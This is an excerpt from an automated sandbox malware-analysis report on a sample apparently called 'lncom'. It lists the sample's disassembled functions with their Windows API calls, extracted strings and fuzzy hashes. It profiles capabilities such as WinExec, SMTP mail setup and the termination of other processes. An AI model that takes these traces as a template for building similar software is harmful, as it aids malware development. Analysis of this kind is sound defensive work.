Part of subcall function 00465A2C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,00000000,?,00465B83,?,0043A112,00000080,00465AD8,00465B98,80000000,00000000), ref: 00465A4A

GetClassInfoA.USER32(00400000,0046D11C,?), ref: 0046D3F9
RegisterClassA.USER32(005D50E0), ref: 0046D411

Part of subcall function 004950E0: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00495111

SetWindowLongA.USER32(?,000000FC,?), ref: 0046D4A7
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0046D4C9
SetClassLongA.USER32(?,000000F2,00000000), ref: 0046D4DC
GetSystemMenu.USER32(?,00000000,?,000000FC,?,00000000,00400000,00000000,00000000,00000000,00000000,00000000), ref: 0046D4E7
DeleteMenu.USER32(00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00400000,00000000,00000000,00000000,00000000,00000000), ref: 0046D4F6
DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00400000,00000000,00000000,00000000), ref: 0046D503
DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,?,00000000,?,000000FC,?,00000000,00400000), ref: 0046D51A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
String ID:
API String ID: 2103932818-0
Opcode ID: db7aa87dea04dffb391c2ac3ea82bda59c85a3bc3fdac26d5e363d21e54bf2e5
Instruction ID: e8469620f91980ee642ec653ee5f216d2b2ac4a05858edc729d729fccb859fc9
Opcode Fuzzy Hash: db7aa87dea04dffb391c2ac3ea82bda59c85a3bc3fdac26d5e363d21e54bf2e5
Instruction Fuzzy Hash: 75416571B412006FE720EB69DC86F9637D8AB19708F504567FA11DF2E3EA79EC048729

Uniqueness

Uniqueness Score: -1.00%

Function 0041C7A4 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 195
processwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040E994: GetVersionExA.KERNEL32(00000094), ref: 0040E9D4
Part of subcall function 0040E994: GetWindowsDirectoryA.KERNEL32(?,00000104,00000094), ref: 0040E9FA

WinExec.KERNEL32(00000000,00000005), ref: 0041C7CC
MessageBoxA.USER32(00000000,00000000,Error,00000010), ref: 0041C8D9

Strings

};\, xrefs: 0041C817
Error, xrefs: 0041C887
KSil, xrefs: 0041C925
Hata, xrefs: 0041C8A7
Hata, xrefs: 0041C7EC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: DirectoryExecMessageVersionWindows
String ID: Error$Hata$Hata$KSil$};\
API String ID: 2396021121-415628260
Opcode ID: 7b34b562c5fafd13d64cbc92fbc2dd7429c08b3926415cc07d883a02d24c3b3c
Instruction ID: 3deb784bf9e373485eafd80f91897afad545ccf273dd9f9b3e941f0394c853c7
Opcode Fuzzy Hash: 7b34b562c5fafd13d64cbc92fbc2dd7429c08b3926415cc07d883a02d24c3b3c
Instruction Fuzzy Hash: 7D81023491022E8BDB61AB91D846BDDF37CFF9A708F5040EB940862253DB785FC98E59

Uniqueness

Uniqueness Score: -1.00%

Function 00450188 Relevance: 12.1, APIs: 8, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(00000000), ref: 00450192
GetTextMetricsA.GDI32(00000000), ref: 0045019B

Part of subcall function 0045B9A0: CreateFontIndirectA.GDI32(0045CA86), ref: 0045BADE

SelectObject.GDI32(00000000,00000000), ref: 004501AA
GetTextMetricsA.GDI32(00000000,?), ref: 004501B7
SelectObject.GDI32(00000000,00000000), ref: 004501BE
ReleaseDC.USER32(00000000,00000000), ref: 004501C6
GetSystemMetrics.USER32(00000006), ref: 004501EC
GetSystemMetrics.USER32(00000006), ref: 00450206

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
String ID:
API String ID: 1583807278-0
Opcode ID: 69e33a6522a66e5a6f3bca7fede388c1360bebdef8ad4933c72b521580a1c98f
Instruction ID: 36784d4357b89c6c3a1d66394965b310f1bdf790fda3ffa7d7caf9403a1c1d6c
Opcode Fuzzy Hash: 69e33a6522a66e5a6f3bca7fede388c1360bebdef8ad4933c72b521580a1c98f
Instruction Fuzzy Hash: B111A191B043446BE31066BACCC2BAB66CDDB4435AF44052FFA45CA393EA6DDC44C37A

Uniqueness

Uniqueness Score: -1.00%

Function 0046C8CC Relevance: 10.6, APIs: 7, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0046C8E0
CreateFontIndirectA.GDI32 ref: 0046C8EA

Part of subcall function 0045BC2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 0045BC39

GetStockObject.GDI32(0000000D), ref: 0046C8FD
SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 0046C91F
CreateFontIndirectA.GDI32(?), ref: 0046C930
CreateFontIndirectA.GDI32(?), ref: 0046C947
GetStockObject.GDI32(0000000D), ref: 0046C967

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 214376e8ddf13abbe13097e707ed2c8d535eebfc052e896ba4624a5d6de1ac19
Instruction ID: febe4514a9ccd014e6dce1e7af130a7342d61020f8803f6f5a664cd961ecb93d
Opcode Fuzzy Hash: 214376e8ddf13abbe13097e707ed2c8d535eebfc052e896ba4624a5d6de1ac19
Instruction Fuzzy Hash: D1117070B402409BE750FA75CC82BAB76D99F44305F10442F7A54DA2ABEFA8DC09C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00468450 Relevance: 9.2, APIs: 6, Instructions: 250
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFocus.USER32(00000000), ref: 0046850B
SaveDC.GDI32(?), ref: 00468632
RestoreDC.GDI32(?,?), ref: 004686A0
GetWindowDC.USER32(00000000), ref: 0046870C
SaveDC.GDI32(?), ref: 00468743
RestoreDC.GDI32(?,?), ref: 004687A4

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: RestoreSave$FocusWindow
String ID:
API String ID: 1553564791-0
Opcode ID: e252adb1adab9200b57f3a4e5fbf1ebba4f0c31c8fab98ebc2df454beb4a5146
Instruction ID: 14a0725295a498a7cce4b22b7b91ac25d36542ac8505280cef8b2436934a3af2
Opcode Fuzzy Hash: e252adb1adab9200b57f3a4e5fbf1ebba4f0c31c8fab98ebc2df454beb4a5146
Instruction Fuzzy Hash: 26A18474A00245DFCB11DF69D985DAEB7F5EB09305F2545AAE80497322EF38DE00DB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00472A70 Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowLongA.USER32(?,000000FC,?), ref: 00472A98
GetWindowLongA.USER32(?,000000F0), ref: 00472AA3
GetWindowLongA.USER32(?,000000F4), ref: 00472AB5
SetWindowLongA.USER32(?,000000F4,?), ref: 00472AC8
SetPropA.USER32(?,00000000,00000000), ref: 00472ADF
SetPropA.USER32(?,00000000,00000000), ref: 00472AF6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 8a3fac07b16ca59f52cdddcf9c89afabdf0de08707de168b328a0ac72ce12b29
Instruction ID: b1fd2871bb00d9dc90f05637f94e70f8a4d173ad12b4f630571978e21c794d58
Opcode Fuzzy Hash: 8a3fac07b16ca59f52cdddcf9c89afabdf0de08707de168b328a0ac72ce12b29
Instruction Fuzzy Hash: A8112676101214FFDB10DF99DD84EDA37E8AB08314B108646BA68CB2A0E238E944EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0046D12C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108windowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 0046D1CD
GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 0046D1FF
OemToCharA.USER32(?,?), ref: 0046D212
CharLowerA.USER32(?,00400000,?,00000100), ref: 0046D252

Strings

MAINICON, xrefs: 0046D1C0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: MAINICON
API String ID: 3935243913-2283262055
Opcode ID: e609c7a67d14fad0e80ba3f4266f6d73d7ee1c3f69c232bdc2b57257c0340fb6
Instruction ID: 638c39168a3a5a4be9cde0f96e20a1153e9f35833eda455244b975fde93d482d
Opcode Fuzzy Hash: e609c7a67d14fad0e80ba3f4266f6d73d7ee1c3f69c232bdc2b57257c0340fb6
Instruction Fuzzy Hash: 8A414D70A042449EDB51EF69C8C57853BE4AB15308F0445FAE848CF357EBBED988CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00442064 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

@Wsocket@TCustomLineWSocket@$bctr$qqrp18Classes@TComponent.LNCOM(?,?), ref: 004420AD
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType.LNCOM ref: 00442121

Strings

4C, xrefs: 004420A8
smtp, xrefs: 00442102
iso-8859-1, xrefs: 00442112

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ContentCustomSmtpSmtpprot@$Classes@Client@ComponentLineSocket@$bctr$qqrp18TypeType$qqr25Wsocket@
String ID: 4C$iso-8859-1$smtp
API String ID: 3102371247-1583330202
Opcode ID: d4ee9db84be11e61113b0d270d4a2e4d3906485af01950dd6c9aa0d52cbae267
Instruction ID: 8090ea12c191a1707bb98282fc0ae6792cf49e768318b7ba53094cd938eb026f
Opcode Fuzzy Hash: d4ee9db84be11e61113b0d270d4a2e4d3906485af01950dd6c9aa0d52cbae267
Instruction Fuzzy Hash: B0213175A00109EFCB00DF99C682A8EB7F1AF49308F6081B9E5089B352D775AF41DB89

Uniqueness

Uniqueness Score: -1.00%

Function 00465AE8 Relevance: 7.6, APIs: 5, Instructions: 60registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(00400000,00465AD8,?), ref: 00465B09
UnregisterClassA.USER32(00465AD8,00400000), ref: 00465B32
RegisterClassA.USER32(005D4FF4), ref: 00465B3C
CreateWindowExA.USER32(00000080,00465AD8,00465B98,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00465B6A
SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 00465B87

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Class$Window$CreateInfoLongRegisterUnregister
String ID:
API String ID: 3404767174-0
Opcode ID: a753854bfbe9e6b3df3c14015c67278602707bf0a7857c6cb7ea5ffa289cc987
Instruction ID: 62b2ec57ca654142023c6e59a415d21e90ae64107a23b0a99d67dbddf10e5329
Opcode Fuzzy Hash: a753854bfbe9e6b3df3c14015c67278602707bf0a7857c6cb7ea5ffa289cc987
Instruction Fuzzy Hash: 46019B712425056FCB30EB98DC85FDB379CAB18704F004207BB04EB3D1E679AD4897AA

Uniqueness

Uniqueness Score: -1.00%

Function 00451420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00451540,?,00000000,00451589), ref: 004514F2
RegCloseKey.ADVAPI32(00000000,00451547,00000000,00451589), ref: 0045153A

Strings

?@, xrefs: 00451445, 0045144F, 00451547, 00451460

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseEnum
String ID: ?@
API String ID: 2818636725-3392405296
Opcode ID: 5982d076f7c96e0b252312b3b60aa61e86b5e91a7b848d1c4a9cf80de4d4affc
Instruction ID: 6167981a7673e85435987aa4f616dc3a2d845f87ea8df479bb20a7a7ac4fc5d3
Opcode Fuzzy Hash: 5982d076f7c96e0b252312b3b60aa61e86b5e91a7b848d1c4a9cf80de4d4affc
Instruction Fuzzy Hash: E3412474E00208AFDF05EFA5D982BAEB7B9EF45305F50457AF811E3252D638AE04CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00478BD8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117registryCOMMON

Download Yara Rule

APIs

GetClassInfoA.USER32(?,?,?), ref: 00478C9C
UnregisterClassA.USER32(?,?), ref: 00478CC4
RegisterClassA.USER32(?), ref: 00478CDA

Strings

@, xrefs: 00478C11

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 3c1ffba35ba67d6bc707f4d2670bc0b8c329eafbca6283d4f504063c76a2cbe7
Instruction ID: b56f106125003882fbd883264df5f3cadd59ab744210b4e8a456f8ab67da6045
Opcode Fuzzy Hash: 3c1ffba35ba67d6bc707f4d2670bc0b8c329eafbca6283d4f504063c76a2cbe7
Instruction Fuzzy Hash: B8418E306402188FDB21EB65CC45BDE77E9AB45308F5484AFE809DB351DB78AD49CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00489290 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000000,TThreadWindow,004872D8,00000000,00000000,00000000,00000000,00000000,00000000,,S],00400000,DrH), ref: 004892B9

Strings

,S], xrefs: 0048929C, 0048929F
DrH, xrefs: 00489294, 00489297
TThreadWindow, xrefs: 004892B6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateWindow
String ID: ,S]$DrH$TThreadWindow
API String ID: 716092398-2781763592
Opcode ID: 0b3b39c39cf6bb5b100e9549d1e5a918b7e413484cc3d1b45f21d7bb5569f374
Instruction ID: c1678c46bc187c187ffbd1cdf7a1f6bb8cd4f107da058de5cda335a544bfa3d3
Opcode Fuzzy Hash: 0b3b39c39cf6bb5b100e9549d1e5a918b7e413484cc3d1b45f21d7bb5569f374
Instruction Fuzzy Hash: EFE0FEB2204209BBDB00DE8ADCC1DABB7ACFB4C654F844105BB1C972428265AD608B71

Uniqueness

Uniqueness Score: -1.00%

Function 00468F34 Relevance: 6.1, APIs: 4, Instructions: 141windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00469046
SetMenu.USER32(00000000,00000000), ref: 00469063
SetMenu.USER32(00000000,00000000), ref: 00469098
SetMenu.USER32(00000000,00000000), ref: 004690B4

Part of subcall function 004950E0: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00495111

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Menu$LoadString
String ID:
API String ID: 3688185913-0
Opcode ID: 26735a198964632d8eea56945678fe8489bd5357bb31bd5d2ec89bae69c0f70a
Instruction ID: 3f63c6e1240319173d303a361e3efa09be677b214462eba1b92975ac3e691019
Opcode Fuzzy Hash: 26735a198964632d8eea56945678fe8489bd5357bb31bd5d2ec89bae69c0f70a
Instruction Fuzzy Hash: 86419B706002008BDB21EB7A8C857AA7799AB54308F04457FBD04DB397EB7DDD0487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D79C Relevance: 6.1, APIs: 4, Instructions: 73threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(00000000,00000000), ref: 0040D7DB
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040D819
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000), ref: 0040D82A
TerminateProcess.KERNEL32(00000000,001F0FFF,00000000,?,00000000,00000000,00000000), ref: 0040D830

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Process$Window$FindOpenTerminateThread
